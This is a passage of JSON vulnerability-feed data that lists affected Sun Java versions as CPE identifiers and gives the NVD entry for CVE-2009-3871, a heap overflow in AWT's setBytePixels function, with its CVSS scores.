"cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Heap-based buffer overflow in the setBytePixels function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via crafted arguments, aka Bug Id 6872358.", "edition": 7, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3871", "type": "cve", 
"cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3871"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", 
"cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", 
"cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3871", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", 